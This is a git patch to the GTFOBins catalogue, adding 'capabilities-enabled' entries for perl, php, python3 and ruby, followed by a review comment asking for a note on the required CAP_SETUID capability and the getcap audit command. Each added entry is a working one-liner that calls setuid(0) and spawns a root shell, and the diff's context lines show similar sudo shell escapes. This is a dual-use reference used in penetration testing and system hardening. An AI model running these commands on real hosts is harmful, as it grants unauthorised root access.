From c7375411b7c601509d15310b83e8086d078604b1 Mon Sep 17 00:00:00 2001
From: Emilio Pinna
Date: Wed, 12 Sep 2018 21:57:04 +0100
Subject: [PATCH] Add capabilities to perl, php, python3, and ruby
---
 _gtfobins/perl.md | 2 ++
 _gtfobins/php.md | 4 ++++
 _gtfobins/python3.md | 2 ++
 _gtfobins/ruby.md | 2 ++
 4 files changed, 10 insertions(+)
diff --git a/_gtfobins/perl.md b/_gtfobins/perl.md
index d3c0e0f..d12e1f8 100644
--- a/_gtfobins/perl.md
+++ b/_gtfobins/perl.md
@@ -12,4 +12,6 @@ functions:
 - code: ./perl -e 'exec "/bin/sh";'
 sudo-enabled:
 - code: sudo perl -e 'exec "/bin/sh";'
+ capabilities-enabled:
+ - code: ./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
 ---
diff --git a/_gtfobins/php.md b/_gtfobins/php.md
index 05f41ea..7acdeb1 100644
--- a/_gtfobins/php.md
+++ b/_gtfobins/php.md
@@ -46,4 +46,8 @@ functions:
 - code: |
 CMD="/bin/sh"
 sudo php -r "system('$CMD');"
+ capabilities-enabled:
+ - code: |
+ CMD="/bin/sh"
+ ./php -r "posix_setuid(0); system('$CMD');"
 ---
diff --git a/_gtfobins/python3.md b/_gtfobins/python3.md
index d340df1..d71c0a4 100644
--- a/_gtfobins/python3.md
+++ b/_gtfobins/python3.md
@@ -34,4 +34,6 @@ functions:
 - code: ./python3 -c 'import os; os.system("/bin/sh -p")'
 sudo-enabled:
 - code: sudo python3 -c 'import os; os.system("/bin/sh")'
+ capabilities-enabled:
+ - code: ./python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
 ---
diff --git a/_gtfobins/ruby.md b/_gtfobins/ruby.md
index 65c0d3c..1fe9fdb 100644
--- a/_gtfobins/ruby.md
+++ b/_gtfobins/ruby.md
@@ -29,4 +29,6 @@ functions:
 - code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
 sudo-enabled:
 - code: sudo ruby -e 'exec "/bin/sh"'
+ capabilities-enabled:
+ - code: ./ruby -e 'Process::Sys.setuid(0); exec "/bin/sh"'
 ---
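Review bot: The new `capabilities-enabled` block in the perl.md hunk never names the capability the entry depends on, and the php.md, python3.md and ruby.md hunks have the same gap. Each snippet goes through a `setuid(0)` call, which succeeds for a non-root caller only when the interpreter carries `CAP_SETUID`. Someone auditing a host therefore cannot tell from the entry which file capability to look for or remove. I would add a YAML comment above each block, for example `# applies when the binary has cap_setuid set; list file capabilities with getcap -r /`. A `description:` field would also work if the page layout renders one, but the layout is not visible in this patch.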